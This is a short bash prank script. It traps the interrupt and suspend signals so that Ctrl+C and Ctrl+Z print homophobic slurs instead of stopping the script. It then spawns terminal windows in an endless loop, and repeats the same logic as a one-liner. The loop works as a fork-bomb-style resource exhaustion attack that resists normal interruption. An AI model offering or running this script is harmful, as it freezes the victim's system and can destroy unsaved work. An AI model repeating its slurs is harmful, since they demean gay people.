#! /bin/bash

trap 'echo "gay"' SIGINT
trap 'echo "pd"' SIGTSTP

while true; do
    gnome-terminal &
done

bash -c 'trap "echo \"gay\"" SIGINT; trap "echo \"pd\"" SIGTSTP; while true; do gnome-terminal & done'
